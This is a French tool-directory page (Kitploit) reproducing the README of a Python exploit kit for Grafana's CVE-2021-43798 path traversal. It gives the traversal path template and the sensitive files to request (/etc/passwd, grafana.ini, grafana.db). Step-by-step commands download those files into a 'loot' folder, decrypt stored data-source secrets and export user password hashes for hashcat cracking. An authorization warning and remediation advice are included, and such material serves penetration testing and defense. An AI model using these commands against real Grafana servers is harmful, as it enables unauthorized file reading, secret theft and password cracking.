Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-43798 — Boîte à outils Python pour les tests autorisés de la traversée de chemin Grafana CVE-2021-43798, avec preuve de concept de lecture de fichier arbitraire, déchiffrement de secrets et export de hachages d'utilisateurs pour les évaluations de sécurité. | Kitploit
Outils/GitHubGitHub/okymi-x/cve-2021-43798
Cassage de Mots de PasseOutils de Chiffrement/DéchiffrementAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'Informations
GitHubokymi-x/cve-2021-43798

CVE-2021-43798

Boîte à outils Python pour les tests autorisés de la traversée de chemin Grafana CVE-2021-43798, avec preuve de concept de lecture de fichier arbitraire, déchiffrement de secrets et export de hachages d'utilisateurs pour les évaluations de sécurité.

Voir le dépôt
3il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-43798 - Lecture arbitraire de fichiers dans Grafana

Kit Python pour les tests autorisés de CVE-2021-43798, une vulnérabilité de traversée de chemin dans Grafana pouvant permettre des lectures arbitraires de fichiers non authentifiées via les chemins de ressources des plugins.

Ce dépôt contient :

  • grafana_poc.py : PoC interactif de lecture arbitraire de fichiers qui enregistre localement les fichiers téléchargés.
  • grafana_pass_decryptor.py : outil d'aide pour déchiffrer les secrets de sources de données Grafana chiffrés lorsque grafana.ini et/ou la secret_key sont disponibles, et pour exporter les hachages de mots de passe utilisateur Grafana depuis grafana.db.

Avertissement

N'utilisez ce projet que sur des systèmes que vous possédez, que vous administrez, ou pour lesquels vous disposez d'une autorisation écrite explicite de test. Une exploitation non autorisée peut exposer des fichiers sensibles, des identifiants, des clés privées, le contenu de bases de données et des hachages de mots de passe utilisateur.

Résumé de la vulnérabilité

CVE-2021-43798 affecte les versions de Grafana allant de 8.0.0-beta1 à 8.3.0. Les versions corrigées sont 8.3.1, 8.2.7, 8.1.8 et 8.0.7.

Le problème est accessible via des routes de ressources de plugins telles que :

root@kitploit:~
/public/plugins/<plugin-id>/../../../../../../../../../../../../..<file>

Les fichiers couramment demandés lors d'une validation autorisée incluent :

root@kitploit:~
/etc/passwd
/etc/grafana/grafana.ini
/var/lib/grafana/grafana.db
/proc/self/cmdline

L'accès dépend des permissions du système d'exploitation dont dispose le processus Grafana.

Prérequis

  • Python 3.10+
  • requests
  • pycryptodome ou cryptography pour le déchiffrement des secrets

Installez les dépendances :

root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt

Guide d'utilisation

1. Lire des fichiers avec le PoC

Exécutez le PoC interactif contre une cible autorisée :

root@kitploit:~
python3 grafana_poc.py -H http://target:3000 -o loot

À l'invite, saisissez des chemins absolus :

root@kitploit:~
Download file > /etc/passwd
Download file > /etc/grafana/grafana.ini
Download file > /var/lib/grafana/grafana.db
Download file > exit

Les fichiers téléchargés sont enregistrés dans le répertoire de sortie en conservant une version sûre du chemin distant, par exemple :

root@kitploit:~
loot/etc/grafana/grafana.ini
loot/var/lib/grafana/grafana.db

2. Déchiffrer les secrets Grafana

Si vous disposez à la fois de grafana.ini et de grafana.db, le déchiffreur peut lire la secret_key depuis le fichier de configuration et tenter de déchiffrer les secrets chiffrés des sources de données, des notifications d'alerte et des plugins :

root@kitploit:~
python3 grafana_pass_decryptor.py \
  --ini loot/etc/grafana/grafana.ini \
  --db loot/var/lib/grafana/grafana.db

Déchiffrez manuellement un bloc chiffré :

root@kitploit:~
python3 grafana_pass_decryptor.py \
  --secret-key SW2YcwTIb9zpOOhoPsMm \
  --blob R3pMVVh1UHLoUkTJOl+Z/sFymLqolUOVtxCtQL/y+Q==

Affichez du JSON délimité par des sauts de ligne :

root@kitploit:~
python3 grafana_pass_decryptor.py \
  --ini loot/etc/grafana/grafana.ini \
  --db loot/var/lib/grafana/grafana.db \
  --json

3. Exporter les hachages utilisateur

Les mots de passe utilisateur Grafana ne sont pas des secrets chiffrés. Ce sont des hachages PBKDF2 salés. Exportez-les depuis la table user :

root@kitploit:~
python3 grafana_pass_decryptor.py \
  --ini loot/etc/grafana/grafana.ini \
  --db loot/var/lib/grafana/grafana.db \
  --users

Exportez uniquement les lignes du mode hashcat 10900 :

root@kitploit:~
python3 grafana_pass_decryptor.py \
  --db loot/var/lib/grafana/grafana.db \
  --users \
  --hashcat > hashes.txt

Remédiation

Mettez à niveau Grafana vers une version corrigée :

  • 8.3.1 ou version ultérieure pour la branche 8.3
  • 8.2.7 ou version ultérieure pour la branche 8.2
  • 8.1.8 ou version ultérieure pour la branche 8.1
  • 8.0.7 ou version ultérieure pour la branche 8.0

Si une mise à niveau immédiate n'est pas possible, l'avis de sécurité de Grafana indique que placer un proxy inverse devant Grafana qui normalise les chemins de requête peut atténuer le comportement de traversée. Traitez cela comme un contrôle temporaire, et non comme un remplacement du correctif.

Références

  • Exploit-DB 50581 : https://www.exploit-db.com/exploits/50581
  • Référentiel de référence jas502n : https://github.com/jas502n/Grafana-CVE-2021-43798
  • Avis de sécurité Grafana GHSA-8pjx-jj86-j47p : https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
  • Article de blog Grafana sur CVE-2021-43798 : https://grafana.com/blog/an-update-on-0day-cve-2021-43798-grafana-directory-traversal/
  • Enregistrement CVE NVD : https://nvd.nist.gov/vuln/detail/CVE-2021-43798

Crédits

Le PoC public original est attribué à s1gh sur Exploit-DB. Le processus de déchiffrement des secrets Grafana s'inspire de recherches publiques et d'exemples de jas502n/Grafana-CVE-2021-43798, ce dépôt fournissant un outil Python pour les laboratoires et les workflows d'évaluation autorisés.

Télécharger l’outil